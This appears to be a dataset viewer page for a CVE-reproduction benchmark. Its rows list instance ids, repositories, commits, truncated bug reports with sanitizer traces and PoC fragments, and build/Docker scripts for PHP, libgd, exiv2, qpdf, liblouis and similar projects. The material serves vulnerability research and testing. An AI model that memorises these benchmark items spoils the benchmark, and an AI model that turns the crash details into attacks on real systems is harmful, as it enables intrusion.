instance_id
stringlengths
17
28
repo
stringclasses
41 values
base_commit
stringlengths
40
40
url
stringlengths
36
128
lang
stringclasses
2 values
bug_description
stringlengths
948
1.81M
build_sh
stringclasses
63 values
dockerfile
stringlengths
251
1.48k
work_dir
stringclasses
36 values
additional_files
listlengths
0
6
php.cve-2016-5096
php/php-src
abd159cce48f3e34f08e4751c568e09677d5ec9c
https://bugs.php.net/bug.php?id=72114
c++
From https://bugs.php.net/bug.php?id=72114: From https://bugs.php.net/bug.php?id=72114: Description: ------------ Run the test script with ASAN. I could only reproduce this on a 64 bit environment. PHPAPI PHP_FUNCTION(fread) { zval *res; long len; php_stream *stream; if (zend_parse_...
#!/bin/bash -eu # Copyright 2019 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agree...
# Copyright 2019 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing,...
/src/php-src
[]
php.cve-2016-7130
php/php-src
698a691724c0a949295991e5df091ce16f899e02
https://bugs.php.net/bug.php?id=72750
c++
From https://bugs.php.net/bug.php?id=72750: From https://bugs.php.net/bug.php?id=72750: Description: ------------ When wddx deserialize tries to parse an invalid base64 binary value, php_base64_decode return NULL. The return value is not checked and used. https://github.com/php/php-src/blob/master/ext/wddx/wddx.c#L896...
#!/bin/bash -eu # Copyright 2019 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agree...
# Copyright 2019 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing,...
/src/php-src
[]
php.cve-2016-7418
php/php-src
c4cca4c20e75359c9a13a1f9a36cb7b4e9601d29
https://bugs.php.net/bug.php?id=73065
c++
From https://bugs.php.net/bug.php?id=73065: From https://bugs.php.net/bug.php?id=73065: Description: ------------ CREDIT ----------------------- This vulnerability was discovered by Ke Liu of Tencent's Xuanwu LAB. PHP VERSION ----------------------- ./sapi/cli/php --version PHP 7.2.0-dev (cli) (built: Sep 11 2016 18:...
#!/bin/bash -eu # Copyright 2019 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agree...
# Copyright 2019 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing,...
/src/php-src
[]
php.cve-2016-7127
php/php-src
1bd103df00f49cf4d4ade2cfe3f456ac058a4eae
https://bugs.php.net/bug.php?id=72730
c++
From https://bugs.php.net/bug.php?id=72730: From https://bugs.php.net/bug.php?id=72730: Description: ------------ Description: ------------ imagegammacorrect accepts two gamma values, if they don't have the same sign then the palette colors will be assigned values bigger than 0xFF, later this values are used to calcula...
#!/bin/bash -eu # Copyright 2019 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agree...
# Copyright 2019 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing,...
/src/php-src
[]
php.cve-2016-7129
php/php-src
426aeb2808955ee3d3f52e0cfb102834cdb836a5
https://bugs.php.net/bug.php?id=72749
c++
From https://bugs.php.net/bug.php?id=72749: From https://bugs.php.net/bug.php?id=72749: Description: ------------ While deserializing an invalid dateTime value, wddx_deserialize will parse it in a wrong way and then assign the supplied value as the address of the created variable. This allows illegal memory access. We ...
#!/bin/bash -eu # Copyright 2019 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agree...
# Copyright 2019 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing,...
/src/php-src
[]
php.cve-2016-7413
php/php-src
b88393f08a558eec14964a55d3c680fe67407712
https://bugs.php.net/bug.php?id=72860
c++
From https://bugs.php.net/bug.php?id=72860: From https://bugs.php.net/bug.php?id=72860: Description: ------------ When WDDX tries to deserialize "recordset" element, use after free happens if close tag for the field is not found. This happens only when field names are set. Test script: --------------- <?php $xml=<<<X...
#!/bin/bash -eu # Copyright 2019 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agree...
# Copyright 2019 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing,...
/src/php-src
[]
libgd.cve-2013-7456
libgd/libgd
4f65a3e4eedaffa1efcf9ee1eb08f0b504fbc31a
https://bugs.php.net/bug.php?id=72227
c++
From https://bugs.php.net/bug.php?id=72227: From https://bugs.php.net/bug.php?id=72227: Description: ------------ Tested on PHP 7 on 32 bits with ASAN and using USE_ZEND_ALLOC=0. user@Xenial32-2:~/crashes/gd$ USE_ZEND_ALLOC=0 gdb -q --args /home/user/php-7.0/sapi/cli/php -n phuzz4.php Reading symbols from /home/user...
#!/bin/bash -eu # Copyright 2018 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agree...
# Copyright 2018 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing,...
/src/libgd
[ { "filename": "parser_target.cc", "content": "// Copyright 2018 Google Inc.\n//\n// Licensed under the Apache License, Version 2.0 (the \"License\");\n// you may not use this file except in compliance with the License.\n// You may obtain a copy of the License at\n//\n// http://www.apache.org/licenses/L...
libgd.cve-2017-6363
libgd/libgd
0be86e1926939a98afbd2f3a23c673dfc4df2a7c
https://github.com/libgd/libgd/issues/383
c++
From https://github.com/libgd/libgd/issues/383: Issue Title: Invalid read when call gdImageTiffPtr (CVE-2017-6363) Issue Body: Description ======== Hi, when I fuzz the libgd, a invalid read occurs within the function tiffWriter of gd_tiff.c, it can be triggered by the [gdfile.txt](https://github.com/libgd/libgd/files...
#!/bin/bash -eu # Copyright 2018 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agree...
# Copyright 2018 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing,...
/src/libgd
[ { "filename": "parser_target.cc", "content": "// Copyright 2018 Google Inc.\n//\n// Licensed under the Apache License, Version 2.0 (the \"License\");\n// you may not use this file except in compliance with the License.\n// You may obtain a copy of the License at\n//\n// http://www.apache.org/licenses/L...
libgd.cve-2021-38115
libgd/libgd
167ea1f4f0003f3e9f7ca1e586189e99cf33d47f
https://github.com/libgd/libgd/issues/697
c++
From https://github.com/libgd/libgd/issues/697: From https://github.com/libgd/libgd/issues/697: Issue Title: Read out of bound in TGA files Issue Body: hello, [this issue](https://github.com/libgd/libgd/issues/247#issue-163166532) is showing a read out of bound for a corrupted TGA [test.txt](https://github.com/libgd/l...
#!/bin/bash -eu # Copyright 2018 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agree...
# Copyright 2018 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing,...
/src/libgd
[ { "filename": "gd_image_string_fuzzer.cc", "content": "// Copyright 2020 Google Inc.\n//\n// Licensed under the Apache License, Version 2.0 (the \"License\");\n// you may not use this file except in compliance with the License.\n// You may obtain a copy of the License at\n//\n// http://www.apache.org/l...
mpv.cve-2020-19824
mpv-player/mpv
5858e3cdbd6fbae3ed80366912dd5df0af4fa126
https://github.com/mpv-player/mpv/issues/6808
c++
From https://github.com/mpv-player/mpv/issues/6808: Issue Title: race condition in audio.c on uninit Issue Body: ### mpv version and platform mpv 0.29.1 mpv 0.29.0-353-g65b1c2d065-dirty MacOS 10.13.6 (17G6030) ### Reproduction steps run script ./fuzz.sh https://github.com/3kyo0/fuzz_samples/blob/master/fuzz.sh ### E...
#!/bin/bash -eu # Copyright 2024 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed...
# Copyright 2024 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, ...
/src/mpv
[]
exiv2.cve-2021-31292
exiv2/exiv2
05ec05342e17dc94670db1818447c06d0da8f41a
https://github.com/Exiv2/exiv2/issues/1530
c++
From https://github.com/Exiv2/exiv2/issues/1530: Issue Title: heap-buffer-overflow Read in Exiv2::Internal::CrwMap::encode Issue Body: **VERSION** exiv 2 0.27.4.1 https://github.com/Exiv2/exiv2/tree/0.27-maintenance **REPRODUCE** Compile exiv2 with asan: ``` CC=clang CXX=clang++ cmake .. -DCMAKE_BUILD_TYPE=Release ...
#!/bin/bash -eu # Copyright 2021 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed...
# Copyright 2021 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, ...
/src/exiv2
[]
exiv2.cve-2020-18771
exiv2/exiv2
7bd929de31622a07bfc16f1c61b6c45e79e69cbb
https://github.com/Exiv2/exiv2/issues/756
c++
From https://github.com/Exiv2/exiv2/issues/756: Issue Title: one global-buffer-overread in Exiv2::Internal::Nikon1MakerNote::print0x0088 in nikonmn_int.cpp Issue Body: POC: [poc.zip](https://github.com/Exiv2/exiv2/files/3001421/poc.zip) There exists one global-buffer-overread in Exiv2::Internal::Nikon1MakerNote::pri...
#!/bin/bash -eu # Copyright 2021 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed...
# Copyright 2021 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, ...
/src/exiv2
[]
exiv2.cve-2018-10999
exiv2/exiv2
234e5794f6b6f99f6538441868659cc5947c9c22
https://github.com/Exiv2/exiv2/issues/306
c++
From https://github.com/Exiv2/exiv2/issues/306: From https://github.com/Exiv2/exiv2/issues/306: From https://github.com/Exiv2/exiv2/issues/306: Issue Title: heap-buffer-overflow on Exiv2::Internal::PngChunk::parseTXTChunk Issue Body: ```jsx ================================================================= ==30669==ERR...
#!/bin/bash -eu # Copyright 2021 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed...
# Copyright 2021 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, ...
/src/exiv2
[]
exiv2.cve-2018-17229
exiv2/exiv2
b6a8d39613a28603a989bd5278798db8a54eeb1e
https://github.com/Exiv2/exiv2/issues/453
c++
From https://github.com/Exiv2/exiv2/issues/453: From https://github.com/Exiv2/exiv2/issues/453: From https://github.com/Exiv2/exiv2/issues/453: Issue Title: CVE-2018-17229: AddressSanitizer: heap-buffer-overflow in Exiv2::d2Data Issue Body: Tested in Ubuntu 16.04, 64bit, Exiv2(master b6a8d39) `$ exiv2 $POC` https://g...
#!/bin/bash -eu # Copyright 2021 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed...
# Copyright 2021 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, ...
/src/exiv2
[]
exiv2.cve-2018-17230
exiv2/exiv2
b6a8d39613a28603a989bd5278798db8a54eeb1e
https://github.com/Exiv2/exiv2/issues/455
c++
From https://github.com/Exiv2/exiv2/issues/455: From https://github.com/Exiv2/exiv2/issues/455: From https://github.com/Exiv2/exiv2/issues/455: Issue Title: CVE-2018-17230: AddressSanitizer: heap-buffer-overflow in Exiv2::ul2Data Issue Body: Tested in Ubuntu 16.04, 64bit, Exiv2(master b6a8d39) `$ exiv2 $POC` https://...
#!/bin/bash -eu # Copyright 2021 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed...
# Copyright 2021 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, ...
/src/exiv2
[]
exiv2.cve-2018-17282
exiv2/exiv2
37b8725565f42c260f9773fe4cfb8fa39f566746
https://github.com/Exiv2/exiv2/issues/457
c++
From https://github.com/Exiv2/exiv2/issues/457: From https://github.com/Exiv2/exiv2/issues/457: From https://github.com/Exiv2/exiv2/issues/457: Issue Title: CVE-2018-17282: SEGV in Exiv2::DataValue::copy at value.cpp:242 Issue Body: Tested in Ubuntu 16.04, 64bit, Exiv2(master 37b8725) `$ exiv2 $POC` https://github.co...
#!/bin/bash -eu # Copyright 2021 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed...
# Copyright 2021 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, ...
/src/exiv2
[]
exiv2.cve-2018-17581
exiv2/exiv2
37b8725565f42c260f9773fe4cfb8fa39f566746
https://github.com/Exiv2/exiv2/issues/460
c++
From https://github.com/SegfaultMasters/covering360/blob/master/Exiv2: From https://github.com/SegfaultMasters/covering360/blob/master/Exiv2: From https://github.com/Exiv2/exiv2/issues/460: Issue Title: Stack overflow due to excessive stack consumption (Recursive function) Issue Body: A stack overflow exits in `CiffDi...
#!/bin/bash -eu # Copyright 2021 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed...
# Copyright 2021 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, ...
/src/exiv2
[]
exiv2.cve-2018-19607
exiv2/exiv2
3f2e0de0db6e0cc2c027dcffd02c24f56331c6c2
https://github.com/Exiv2/exiv2/issues/561
c++
From https://github.com/Exiv2/exiv2/issues/561: From https://github.com/Exiv2/exiv2/issues/561: From https://github.com/Exiv2/exiv2/issues/561: Issue Title: CVE-2018-19607: SEGV in Exiv2::isoSpeed at easyaccess.cpp:178 Issue Body: Tested in ubuntu 16.04 64bit, exiv2 (master 3f2e0de && 0.27-RC2) `$ exiv2 $POC` [POC fi...
#!/bin/bash -eu # Copyright 2021 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed...
# Copyright 2021 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, ...
/src/exiv2
[]
exiv2.cve-2019-14370
exiv2/exiv2
c4f8561520aeee07ac180648d485d5d96e913c44
https://github.com/Exiv2/exiv2/issues/954
c++
From https://github.com/Exiv2/exiv2/issues/954: From https://github.com/Exiv2/exiv2/issues/954: From https://github.com/Exiv2/exiv2/issues/954: Issue Title: heap-buffer-overflow in Exiv2::MrwImage::readMetadata() Issue Body: **Describe the bug** in my research , a heap overflow found in Exiv2::MrwImage::readMetadata...
#!/bin/bash -eu # Copyright 2021 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed...
# Copyright 2021 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, ...
/src/exiv2
[]
exiv2.cve-2021-29458
exiv2/exiv2
05ec05342e17dc94670db1818447c06d0da8f41a
https://github.com/Exiv2/exiv2/issues/1530
c++
From https://github.com/Exiv2/exiv2/issues/1530: From https://github.com/Exiv2/exiv2/issues/1530: From https://github.com/Exiv2/exiv2/issues/1530: Issue Title: heap-buffer-overflow Read in Exiv2::Internal::CrwMap::encode Issue Body: **VERSION** exiv 2 0.27.4.1 https://github.com/Exiv2/exiv2/tree/0.27-maintenance **RE...
#!/bin/bash -eu # Copyright 2021 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed...
# Copyright 2021 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, ...
/src/exiv2
[]
exiv2.cve-2020-18899
exiv2/exiv2
e93c3728252cd4b673ad5462c6d750380d35b299
https://github.com/Exiv2/exiv2/issues/742
c++
From https://github.com/Exiv2/exiv2/issues/742: From https://github.com/Exiv2/exiv2/issues/742: Issue Title: [bug report] Program crash due to uncontrolled memory allocation on function DataBuf data(subBox.length-sizeof(box)) Issue Body: Hi there, An issue was discovered in DataBuf data(subBox.length-sizeof(box)) fun...
#!/bin/bash -eu # Copyright 2021 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed...
# Copyright 2021 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, ...
/src/exiv2
[]
exiv2.cve-2017-17669
exiv2/exiv2
4be065595e4b81e876e32c9c4705f8313f896d43
https://github.com/Exiv2/exiv2/issues/187
c++
From https://github.com/Exiv2/exiv2/issues/187: Issue Title: CVE-2017-17669: heap-buffer-overflow in Exiv2::Internal::PngChunk::keyTXTChunk Issue Body: ## Description There is a heap-buffer-overflow vulnerability in Exiv2. The command is: ./exiv2 POC Stack trace with asan: ``` ==2826==ERROR: AddressSanitizer: heap-b...
#!/bin/bash -eu # Copyright 2021 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed...
# Copyright 2021 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, ...
/src/exiv2
[]
exiv2.cve-2018-11531
exiv2/exiv2
c80b1b9d51689692bc865f1a1d16bf7fd2a532c4
https://github.com/Exiv2/exiv2/issues/283
c++
From https://github.com/Exiv2/exiv2/issues/283: Issue Title: CVE-2018-11531: heap buffer overflow in preview.cpp Issue Body: ``` <snip> Error: Offset of directory PanasonicRaw, entry 0x0148 is out of bounds: Offset = 0x00000000; truncating the entry ================================================================= ==1...
#!/bin/bash -eu # Copyright 2021 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed...
# Copyright 2021 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, ...
/src/exiv2
[]
qpdf.cve-2022-34503
qpdf/qpdf
d71f05ca07eb5c7cfa4d6d23e5c1f2a800f52e8e
https://github.com/qpdf/qpdf/issues/701
c++
From https://github.com/qpdf/qpdf/issues/701: Issue Title: heap-buffer-overflow in `QPDF::processXRefStream` found by ASAN Issue Body: Hi, I have found a heap-buffer-overflow in QPDF 8.4.2 using ASAN, which has not been reported yet. But after https://github.com/qpdf/qpdf/commit/d71f05ca07eb5c7cfa4d6d23e5c1f2a800f52e8...
#!/bin/bash -eu # Copyright 2018 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agree...
# Copyright 2018 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing,...
/src/qpdf
[]
qpdf.cve-2021-25786
qpdf/qpdf
78b9d6bfd4cbd3e947b1c5ffe73eb97b040e312a
https://github.com/qpdf/qpdf/issues/492
c++
From https://github.com/qpdf/qpdf/issues/492: Issue Title: Heap-use-after-free in `Pl_ASCII85Decoder::write` Issue Body: - version: 10.0.4 - commit: 78b9d6bfd4cbd3e947b1c5ffe73eb97b040e312a - How to reproduce: qpdf_afl_fuzzer ./poc The log from ASAN: ``` ==28751==ERROR: AddressSanitizer: heap-use-after-free on addres...
#!/bin/bash -eu # Copyright 2018 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agree...
# Copyright 2018 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing,...
/src/qpdf
[]
liblouis.cve-2018-11577
liblouis/liblouis
7e135b9313ad06218dfcf9ed63070edede7745a1
https://github.com/liblouis/liblouis/issues/582
c++
From https://github.com/Edward-L/fuzzing-pocs/tree/master/liblouis: From https://github.com/liblouis/liblouis/issues/582: Issue Title: SEGV-logging-c-148 Issue Body: asan report ``` ASAN:SIGSEGV ================================================================= ==59249==ERROR: AddressSanitizer: SEGV on unknown address...
#!/bin/bash -eu # Copyright 2021 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed...
# Copyright 2021 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, ...
/src/liblouis
[]
liblouis.cve-2022-26981
liblouis/liblouis
4d73c81aba59cfdd38736b87bac5b0b8c6bd2053
https://github.com/liblouis/liblouis/issues/1171
c++
From https://github.com/liblouis/liblouis/issues/1171: Issue Title: [BUG] global-buffer-overflow in lou_checktable Issue Body: **Describe the bug** There is a global-buffer-overflow bug found in compilePassOpcode, can be triggered via lou_checktable+ ASan **To Reproduce** Steps to reproduce the behavior: ``` export C...
#!/bin/bash -eu # Copyright 2021 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed...
# Copyright 2021 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, ...
/src/liblouis
[]
liblouis.cve-2023-26767
liblouis/liblouis
6223f2134b2d817c6e16fa6ddf3a019fa28c1cd9
https://github.com/liblouis/liblouis/issues/1292
c++
From https://github.com/liblouis/liblouis/issues/1292: Issue Title: global-buffer-overflow in lou_setDataPath() when long path is given Issue Body: When long path is given to API `lou_setDataPath()`, there will be a global-buffer-overflow. Similar to #1291, because liblouis does not check the input length. https://g...
#!/bin/bash -eu # Copyright 2021 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed...
# Copyright 2021 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, ...
/src/liblouis
[]
liblouis.cve-2023-26768
liblouis/liblouis
6223f2134b2d817c6e16fa6ddf3a019fa28c1cd9
https://github.com/liblouis/liblouis/issues/1301
c++
From https://github.com/liblouis/liblouis/issues/1301: Issue Title: global-buffer-overflow in lou_logFile() when long filename is given Issue Body: ## Summary When long filename (larger than 256) is given to API `lou_logFile()`, there will be a global-buffer-overflow. https://github.com/liblouis/liblouis/blob/517f6f1...
#!/bin/bash -eu # Copyright 2021 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed...
# Copyright 2021 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, ...
/src/liblouis
[]
liblouis.cve-2022-31783
liblouis/liblouis
83c91359ee77cabd49d64392c18cb2635855515c
https://github.com/liblouis/liblouis/issues/1214
c++
From https://github.com/liblouis/liblouis/issues/1214: Issue Title: [BUG] invalid memory writes in compileRule, liblouis/compileTranslationTable.c:3744 Issue Body: ## summary Hello, I was testing my new fuzzer and found an invalid memory write in function compileRule, liblouis/compileTranslationTable.c:3744. Which can...
#!/bin/bash -eu # Copyright 2021 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed...
# Copyright 2021 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, ...
/src/liblouis
[]
libsass.cve-2018-11693
sass/libsass
60f839158eff1f1bb84cb44f0f0c4bce3ed86a6d
https://github.com/sass/libsass/issues/2661
c++
From https://github.com/sass/libsass/issues/2661: From https://github.com/sass/libsass/issues/2661: Issue Title: AddressSanitizer: heap-buffer-overflow (OOB read) in Sass::Prelexer::skip_over_scopes (libsass/src/prelexer.hpp:69:14) Issue Body: Hey there, I have discovered a single byte out-of-bands read (OOB) in libsa...
#!/bin/bash -eu # Copyright 2018 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agree...
